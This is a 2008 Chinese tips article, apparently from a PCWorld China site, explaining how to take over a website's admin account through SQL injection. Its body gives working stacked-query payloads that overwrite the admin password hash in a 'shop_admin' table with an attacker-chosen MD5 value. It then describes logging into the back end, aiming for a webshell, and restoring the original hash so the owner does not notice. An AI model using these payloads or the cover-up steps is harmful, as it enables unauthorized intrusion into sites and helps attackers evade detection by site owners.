产品中心

新闻邮件订阅

IT要闻
产品评测
技巧推荐
社区精华
请输入您的e-mail地址:

使用技巧 - How to Use

 您的位置:首页 > 使用技巧 > Windows技巧
注射修改管理员密码
用注射方法修改加密密码
 PCWorld.COM.CN | 2008-05-20 14:15:13 |

引:注入点已经找到:xxx.com/book.asp?id=1996 我刚已经用NB检测过了。可以看到,存在表段 shop_admin。

  注入点已经找到:xxx.com/book.asp?id=1996  我刚已经用NB检测过了。可以看到,存在表段 shop_admin。 

  可是密码是MD5加密的:[adminid]:24 [admin]:zhuyaod [password]:d4716077c2ba075c  我们来尝试欺骗。可以看出,欺骗是没戏滴。  那咋办?难道要跑密码?那得浪费多少时间和内存啊? 

  下面我来介绍一种新方法:注射。注射的语句如下:  ;update shop_admin set password=’新MD5加密密码’ where password=’d4716077c2ba075c’--  比如,我需要把zhuyaod的密码改成wmmhacker,我们首先要先获得wmmhacker通过MD5加密后的十二位密码  这里用明小子的工具就能转换了。wmmhacker - f8dc763194f29433  ;update shop_admin set password=’f8dc763194f29433’ where password=’d4716077c2ba075c’--  我们来测试。看见了,页面没有返回错误,表示成功了。 

  现在我们对shop_admin表段下的密码做重新解猜。  [adminid]:24 [admin]:zhuyaod [password]:f8dc763194f29433  大家对比一下,已经改变了。现在我们可以登陆了。  进来了。呵呵。就到这里了吧。值得提一句的是,我们进了后台,然后想办法拿到WEBSHELL。 

  接着,别忘了把管理员密码还原。不然他会发现滴!  ;update shop_admin set password=’d4716077c2ba075c’ where password=’f8dc763194f29433’--

 
 
 
推荐】【打印
 
相关文章
· 各类系统ROOT密码丢失解决办法 2008-04-18 14:45:48
· 破解电脑中密码的常规方法 2008-04-17 13:09:46
· 用U盘轻松绕过XP登录密码 2008-04-17 13:12:24
· 安全技巧:巧用汉字做密码 2008-04-15 12:17:15
 
 
PCWorld社区

网友评论
以下网友评论只代表网友个人观点,不代表PCWorld观点
发表内容:

SPONSORED LINKS

联想M930一体机体验专区
5月15日,联想率先在喷墨一体机市场上发布了针对soho用户和小型办公类市场为主打……
联想外设数码业务百城巡展
传承奥运品质 倾心百城服务
爱普生3LCD联盟
了解3LCD已经汇集了3LCD技术精英的联盟站点
全方位深入的存储资讯
从企业级到个人应用,从业界动态到大型评测,带您尽览存储风云
享受高质量低成本的照片打印
联想4330照片打印机,打印成本仅需1元
尚品·人生网
尚品·人生网,让优质生活与事业和谐平衡
中华部落阁
加入中华部落阁,记录你的新生活。
润眼电脑“3H高清润眼屏”
免费体验,火热报名,海尔润眼电脑系列。
万元级彩色激光一体机
爱普生彩色激光多功能一体机CX11系列专区
联想投影机全球同一品质
新联想一周年庆典 新投影共享全球同一品质
关于我们投稿指南 公告 注册 诚信与安全 规则与政策 友情链接 网站地图 IDG全球资源 业务联系 68130909-6865 《微电脑世界》2009刊例
Copyright(c) 2000-2008 pcworld.com.cn. All Rights Reserved. 京ICP备 05038969 号